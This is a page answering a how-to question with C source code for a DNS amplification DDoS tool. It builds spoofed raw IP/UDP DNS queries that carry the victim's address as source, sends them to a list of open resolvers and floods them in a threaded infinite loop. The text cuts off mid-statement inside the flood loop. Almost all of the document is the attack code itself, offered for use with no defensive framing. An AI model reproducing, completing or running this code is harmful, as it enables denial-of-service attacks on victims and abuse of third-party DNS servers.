How to C Program DNS AMPLIFICATION DDOS SCRIPT in C Programming Language ?
Solution:
/* DNS AMPLIFICATION DDOS SKRIPT */
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
#define PACKETS_PER_RESOLVER 25
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
char domain[512];
int line;
struct list *next;
struct list *prev;
};
struct list *head;
struct thread_data{
int thread_id;
struct list *list_node;
struct sockaddr_in sin;
int port;
};
struct DNS_HEADER
{
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
};
//Constant sized fields of query structure
struct QUESTION
{
unsigned short qtype;
unsigned short qclass;
};
//Constant sized fields of the resource record structure
struct QUERY
{
unsigned char *name;
struct QUESTION *ques;
};
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
{
int lock = 0 , i;
strcat((char*)host,".");
for(i = 0 ; i < strlen((char*)host) ; i++)
{
if(host[i]=='.')
{
*dns++ = i-lock;
for(;lock<i;lock++)
{
*dns++=host[lock];
}
lock++; //or lock=i+1;
}
}
*dns++='\0';
}
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
/* function for header checksums */
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_udp_header(struct udphdr *udph)
{
}
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char strPacket[MAX_PACKET_SIZE];
int iPayloadSize = 0;
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int iPort = td->port;
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(s < 0)
{
fprintf(stderr, "Error: Could not open raw socket. Root privileges are required!\n");
exit(-1);
}
//init random
init_rand(time(NULL));
// Clear the data
memset(strPacket, 0, MAX_PACKET_SIZE);
// Make the packet
struct iphdr *iph = (struct iphdr *) &strPacket;
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + 38;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
iPayloadSize += sizeof(struct iphdr);
struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
udph->source = htons(iPort);
udph->dest = htons(53);
udph->check = 0;
iPayloadSize += sizeof(struct udphdr);
struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
dns->id = (unsigned short) htons(rand_cmwc());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = htons(1);
iPayloadSize += sizeof(struct DNS_HEADER);
sin.sin_port = udph->source;
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
char strDomain[512];
int i;
int j = 0;
int iAdditionalSize = 0;
while(1)
{
if(j==2){
usleep(100);
j=0;
}
//set the next node
list_node = list_node->next;
//Clear the old domain and question
memset(&strPacket[iPayloadSize +